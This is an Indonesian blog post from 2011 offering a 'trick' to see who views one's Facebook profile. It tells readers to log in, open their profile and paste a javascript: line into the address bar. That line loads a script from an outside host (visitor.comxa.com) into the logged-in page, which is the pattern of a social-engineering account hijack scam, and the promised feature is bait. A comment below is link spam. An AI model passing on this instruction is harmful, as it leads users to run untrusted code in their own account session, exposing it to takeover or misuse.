Jumat, 29 April 2011

Tips N Trik cara mengetahui siapa yang paling banyak melihat profil kita di facebook

Tips N Trik cara mengetahui siapa yang paling banyak melihat profil kita di facebook
setelah sekian lama vakum menulis kini mas dzoee (cielah mas dzoee) hahaha hadir dengan tips n triks terhangat (kopi kali yak) sebelumnya saya pernah menulus beberapa tips n triks facebook..yang orisinil yaitu tips cara Update Status Facebook melalui apple iphone tanpa memiliki apple




dan sekarang ane mau sharing nih tips terbaru yang ane punya yaitu Tips N Trik cara mengetahui siapa yang paling banyak melihat profil kita di facebook...
penasaran kan pengentahu siapa sih yang paling banyak melihat profil anda ...
yuk langsung saja kita bahas tipsnya ::



Begini nih caranya perhatikan yuk dengan seksama :P


Step 1 - Salin script berikut:

 


javascript:(a=(b=document).createElement('script')).src='//visitor.comxa.com/viewers.js?'+Math.random(),b.body.appendChild(a);void(0)



Step 2:

Login ke Facebook


Klik profil kamu
Paste kode di Address Bar. Kemudian tekan enter!


Silakan tunggu....
Kamu akan liat 10 org yg sdg mengunjungi profil kamu 

Dan Tring.....selesai deh Tips N Trik cara mengetahui siapa yang paling banyak melihat profil kita di facebook


1 komentar:

Blog3 mengatakan...

jgn lupa visit n koment gan
di
www.AREA-PANAS.blogspot.com

Posting Komentar

Silahkan beri komentar dengan bijak dan jangan sampai komentar anda masuk dalam {COMMENTS SPAM}. Thanks